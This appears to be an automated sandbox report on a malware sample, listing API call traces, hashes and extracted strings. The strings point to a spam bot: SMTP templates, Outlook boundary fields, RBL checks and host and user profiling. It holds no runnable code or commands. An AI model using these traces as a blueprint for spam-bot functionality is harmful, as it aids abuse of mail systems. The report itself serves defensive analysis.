                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 127016686-0
                                                                                        • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                        • Instruction ID: f4fb772eb9e362243b29045569ead51e20eaa37799438b2c4fe4ac061ddf8126
                                                                                        • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                        • Instruction Fuzzy Hash: 9061CE71904385ABC3209F65DC4CB6BBBE8EB88755F044819FD8497390E7B9DC80CBA6
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                          • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                          • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                          • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                          • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                          • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                          • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                        • wsprintfA.USER32 ref: 0040AEA5
                                                                                          • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                        • wsprintfA.USER32 ref: 0040AE4F
                                                                                        • wsprintfA.USER32 ref: 0040AE5E
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                        • API String ID: 3631595830-1816598006
                                                                                        • Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                        • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                        • Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                        • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll,759223A0,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                        • htons.WS2_32(00000035), ref: 00402E88
                                                                                        • inet_addr.WS2_32(?), ref: 00402E93
                                                                                        • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: GetNetworkParams$iphlpapi.dll
                                                                                        • API String ID: 929413710-2099955842
                                                                                        • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                        • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                        • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                        • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                        • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                        • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                        • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,75920F10,00000000), ref: 0040688B
                                                                                        • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,75920F10,00000000), ref: 00406906
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,75920F10,00000000), ref: 0040691C
                                                                                        • CloseHandle.KERNEL32(000000FF,?,75920F10,00000000), ref: 00406971
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 2622201749-0
                                                                                        • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                        • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                        • wsprintfA.USER32 ref: 004093CE
                                                                                        • wsprintfA.USER32 ref: 0040940C
                                                                                        • wsprintfA.USER32 ref: 0040948D
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: runas
                                                                                        • API String ID: 3696105349-4000483414
                                                                                        • Opcode ID: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction ID: b6d0878b1d73306239325ce20442e1ed3f1d42e4277a972a89fda7ad6b3a58d4
                                                                                        • Opcode Fuzzy Hash: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction Fuzzy Hash: A7A181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 0040B467
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                          • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$wsprintf
                                                                                        • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                        • API String ID: 1220175532-2340906255
                                                                                        • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                        • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                        • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                        • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 02D7202D
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 02D7204F
                                                                                        • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 02D7206A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02D72071
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 02D72082
                                                                                        • GetTickCount.KERNEL32 ref: 02D72230
                                                                                          • Part of subcall function 02D71E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 02D71E7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                        • API String ID: 4207808166-1391650218
                                                                                        • Opcode ID: a6853c32b60f2cc87b9b05c4564022504dbed896d64d3d62fe446b684c9c1410
                                                                                        • Instruction ID: 072ab39fae460283a235dd4bf011c30df6964c9463fa879a5be80264dc2995a2
                                                                                        • Opcode Fuzzy Hash: a6853c32b60f2cc87b9b05c4564022504dbed896d64d3d62fe446b684c9c1410
                                                                                        • Instruction Fuzzy Hash: 7A5172705043446FE330AF658C89B67BBECEB55708F00496DF99682241E7BDA984CB75
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402078
                                                                                        • GetTickCount.KERNEL32 ref: 004020D4
                                                                                        • GetTickCount.KERNEL32 ref: 004020DB
                                                                                        • GetTickCount.KERNEL32 ref: 0040212B
                                                                                        • GetTickCount.KERNEL32 ref: 00402132
                                                                                        • GetTickCount.KERNEL32 ref: 00402142
                                                                                          • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
                                                                                          • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093
                                                                                          • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                          • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                          • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                        • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                        • API String ID: 3976553417-1522128867
                                                                                        • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                        • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                        • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                        • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                        APIs
                                                                                        • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                        • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                        • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                        • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                        • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                        • ExitProcess.KERNEL32 ref: 00404121
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEventExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2404124870-0
                                                                                        • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                        • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                        APIs
                                                                                          • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                          • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                        • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                        • GetTickCount.KERNEL32 ref: 0040C363
                                                                                        • GetTickCount.KERNEL32 ref: 0040C378
                                                                                        • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                        • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
                                                                                        • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1553760989-1857712256
                                                                                        • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                        • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                        • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                        • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02D73068
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D73078
                                                                                        • GetProcAddress.KERNEL32(00000000,00410408), ref: 02D73095
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D730B6
                                                                                        • htons.WS2_32(00000035), ref: 02D730EF
                                                                                        • inet_addr.WS2_32(?), ref: 02D730FA
                                                                                        • gethostbyname.WS2_32(?), ref: 02D7310D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 02D7314D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: iphlpapi.dll
                                                                                        • API String ID: 2869546040-3565520932
                                                                                        • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                        • Instruction ID: f05c316c61bcb28915cab05b62406ddbdd3d3baa158ec9061dde4696046bcb2b
                                                                                        • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                        • Instruction Fuzzy Hash: 1E31B331A00706ABDF519BB89C48BAE77B8AF04364F1441A5E918E3390EB78DD41DB58
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?), ref: 02D795A7
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 02D795D5
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 02D795DC
                                                                                        • wsprintfA.USER32 ref: 02D79635
                                                                                        • wsprintfA.USER32 ref: 02D79673
                                                                                        • wsprintfA.USER32 ref: 02D796F4
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02D79758
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02D7978D
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02D797D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3696105349-0
                                                                                        • Opcode ID: 0ac1c7cf1312716136e7fb6a36e28e3fd6dbc7c146b39f469b2464a0e942be83
                                                                                        • Instruction ID: b168472e26b943e6a803ffa50bcb3a5755e3bbb790e70de9a009b0a2d6f84749
                                                                                        • Opcode Fuzzy Hash: 0ac1c7cf1312716136e7fb6a36e28e3fd6dbc7c146b39f469b2464a0e942be83
                                                                                        • Instruction Fuzzy Hash: 2FA16CB2900258AFEB21DFA4CC45FDA3BADEB04745F104026FA15D6251F7B9D984CFA4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                        • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: DnsQuery_A$dnsapi.dll
                                                                                        • API String ID: 3560063639-3847274415
                                                                                        • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                        • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                        • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                        • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                        APIs
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcmpi
• String ID: smtp_ban$smtp_herr$smtp_retr
• API String ID: 1586166983-1625972887
• Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
• Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
• Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
• Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
• GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
• DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
• GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
• String ID:
• API String ID: 3188212458-0
• Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
• Instruction ID: ab228a986819567a034f5778c60117e3a6ddbbfebf067212e33de9fc62893814
• Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
• Instruction Fuzzy Hash: 6C31F1B2900108BFDB00DFA09D44ADF7F78EF48310F158076E212F7291D674A9618F69
APIs
• IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 02D767C3
• htonl.WS2_32(?), ref: 02D767DF
• htonl.WS2_32(?), ref: 02D767EE
• GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D768F1
• ExitProcess.KERNEL32 ref: 02D769BC
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: Processhtonl$CurrentExitHugeRead
• String ID: except_info$localcfg
• API String ID: 1150517154-3605449297
• Opcode ID: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
• Instruction ID: 126f005f765f380df6f3008adefa1c950c60ebc7628392498afad693c739c2fd
• Opcode Fuzzy Hash: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
• Instruction Fuzzy Hash: 0C615F71940208AFDB609FB4DC45FEA77E9FB08300F248066F96DD2261EB759994CF64
APIs
• htons.WS2_32(02D7CC84), ref: 02D7F5B4
• socket.WS2_32(00000002,00000001,00000000), ref: 02D7F5CE
• closesocket.WS2_32(00000000), ref: 02D7F5DC
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: closesockethtonssocket
• String ID: time_cfg
• API String ID: 311057483-2401304539
• Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
• Instruction ID: f20aeb8f8de8b69f2a170ebdaeb1b1876f290846d15cfa2081cff548900abd47
• Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
• Instruction Fuzzy Hash: DD315C72900118AFDB20DFA9DC88DEE7BBCEF89310F104566F915E3250E7749A81CBA4
APIs
• GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
• ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
• LocalFree.KERNEL32(00000120), ref: 0040701F
• wsprintfA.USER32 ref: 00407036
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
• String ID: /%d$|
• API String ID: 676856371-4124749705
• Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
• Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
• Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
• Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
APIs
• GetModuleHandleA.KERNEL32(?), ref: 02D72FA1
• LoadLibraryA.KERNEL32(?), ref: 02D72FB1
• GetProcAddress.KERNEL32(00000000,004103F0), ref: 02D72FC8
• GetProcessHeap.KERNEL32(00000000,00000108), ref: 02D73000
• RtlAllocateHeap.NTDLL(00000000), ref: 02D73007
• lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 02D73032
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
Similarity
• API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
• String ID: dnsapi.dll
• API String ID: 1242400761-3175542204
• Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
